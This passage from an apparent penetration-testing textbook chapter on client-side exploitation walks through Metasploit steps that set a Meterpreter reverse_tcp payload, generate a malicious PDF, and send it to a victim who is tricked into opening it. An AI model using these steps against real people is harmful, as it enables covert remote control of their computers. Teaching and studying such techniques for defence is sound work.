Client Side Exploitation
◾
211
You can also edit the launch action message depending upon the scenario. You can do this by
typing the following command:
set LAUNCH_Message
Step 4
—Once you are done with the exploit part, you need to choose an appropriate payload.
To choose a payload, type the following command:
set payload windows/meterpreter/reverse_tcp
The payload will be followed by the LHOST and LPORT
Step 5
—Then type “exploit” and it will generate your malicious PDF file. It will save the PDF
file in the
/root/.msf4/local/
directory.
Finally, we will send it to the victim and trick him into executing it. Once it is executed, you
will have injected a Meterpreter shell on his computer.
Dostları ilə paylaş: